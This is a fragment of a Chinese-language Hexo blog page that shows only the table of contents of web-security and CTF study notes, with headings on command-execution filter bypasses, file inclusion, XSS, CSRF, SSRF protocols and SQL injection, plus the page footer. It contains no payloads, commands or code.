class="toc-number">1.1.</span> <span class="toc-text">源码泄露</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%95%8F%E6%84%9F%E6%95%B0%E6%8D%AE%E6%B3%84%E9%9C%B2"><span class="toc-number">1.2.</span> <span class="toc-text">敏感数据泄露</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E6%9A%B4%E5%8A%9B%E7%A0%B4%E8%A7%A3"><span class="toc-number">2.</span> <span class="toc-text">暴力破解</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C"><span class="toc-number">3.</span> <span class="toc-text">命令执行</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%95%8F%E6%84%9F%E8%AF%8D%E6%B1%87%E8%BF%87%E6%BB%A4"><span class="toc-number">3.1.</span> <span class="toc-text">敏感词汇过滤</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%95%8F%E6%84%9F%E5%AD%97%E7%AC%A6%E8%BF%87%E6%BB%A4"><span class="toc-number">3.2.</span> <span class="toc-text">敏感字符过滤</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%95%B0%E5%AD%97%E3%80%81%E5%AD%97%E6%AF%8D%E8%BF%87%E6%BB%A4"><span class="toc-number">3.3.</span> <span class="toc-text">数字、字母过滤</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E4%B8%BE%E4%BA%9B%E4%BE%8B%E5%AD%90%EF%BC%88%E4%BB%A5%E4%B8%8B%E9%A2%98%E7%9B%AE%E6%9D%A5%E8%87%AActfshow%EF%BC%89%EF%BC%9A"><span class="toc-number">3.3.1.</span> <span class="toc-text">举些例子（以下题目来自ctfshow）：</span></a></li></ol></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8"><span class="toc-number">4.</span> <span class="toc-text">漏洞利用</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%BC%AA%E9%9A%8F%E6%9C%BA%E6%95%B0%E6%BC%8F%E6%B4%9E"><span class="toc-number">4.1.</span> <span class="toc-text">伪随机数漏洞</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB%E6%BC%8F%E6%B4%9E"><span class="toc-number">4.2.</span> <span class="toc-text">文件包含漏洞</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E"><span class="toc-number">4.3.</span> <span class="toc-text">文件上传漏洞</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#XSS%E8%B7%A8%E7%AB%99%E8%84%9A%E6%9C%AC%E6%BC%8F%E6%B4%9E"><span class="toc-number">4.4.</span> <span class="toc-text">XSS跨站脚本漏洞</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#CSRF%E6%BC%8F%E6%B4%9E"><span class="toc-number">4.5.</span> <span class="toc-text">CSRF漏洞</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#SSRF%E6%BC%8F%E6%B4%9E"><span class="toc-number">4.6.</span> <span class="toc-text">SSRF漏洞</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%88%A9%E7%94%A8%E6%96%B9%E5%BC%8F"><span class="toc-number">4.6.1.</span> <span class="toc-text">利用方式</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%8D%8F%E8%AE%AE%E5%88%A9%E7%94%A8"><span class="toc-number">4.6.2.</span> <span class="toc-text">协议利用</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#Dict%E5%8D%8F%E8%AE%AE"><span class="toc-number">4.6.2.1.</span> <span class="toc-text">Dict协议</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#Gopher%E5%8D%8F%E8%AE%AE"><span class="toc-number">4.6.2.2.</span> <span class="toc-text">Gopher协议</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#File%E5%8D%8F%E8%AE%AE"><span class="toc-number">4.6.2.3.</span> <span class="toc-text">File协议</span></a></li></ol></li></ol></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#SQL%E6%B3%A8%E5%85%A5"><span class="toc-number">5.</span> <span class="toc-text">SQL注入</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E7%83%AD%E8%BA%AB%EF%BC%9A%E4%B8%87%E8%83%BD%E5%AF%86%E7%A0%81%E7%BB%95%E8%BF%87"><span class="toc-number">5.1.</span> <span class="toc-text">热身：万能密码绕过</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%B3%A8%E5%85%A5%E7%B1%BB%E5%9E%8B"><span class="toc-number">5.2.</span> <span class="toc-text">注入类型</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%95%B0%E5%AD%97%E5%9E%8B%E6%B3%A8%E5%85%A5"><span class="toc-number">5.2.1.</span> <span class="toc-text">数字型注入</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%AD%97%E7%AC%A6%E5%9E%8B%E6%B3%A8%E5%85%A5"><span class="toc-number">5.2.2.</span> <span class="toc-text">字符型注入</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%B3%A8%E5%85%A5%E8%8A%9D%E5%A3%AB"><span class="toc-number">5.3.</span> <span class="toc-text">注入芝士</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#SQL-Server"><span class="toc-number">5.3.1.</span> <span class="toc-text">SQL Server</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#MySQL"><span class="toc-number">5.3.2.</span> <span class="toc-text">MySQL</span></a></li></ol></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link"><span class="toc-number">6.</span> <span class="toc-text">&lt;- To be continued</span></a></li></ol></div></div><footer><nobr>Published with <a target="_blank" rel="noopener" href="http://hexo.io">Hexo</a></nobr><wbr><nobr> Theme <a target="_blank" rel="noopener" href="https://github.com/Yue-plus/hexo-theme-arknights">Arknights</a></nobr><wbr><nobr> by <a target="_blank" rel="noopener" href="https://github.com/Yue-plus">Yue_plus</a></nobr></footer></aside></main><canvas id="canvas-dust"></canvas></body></html>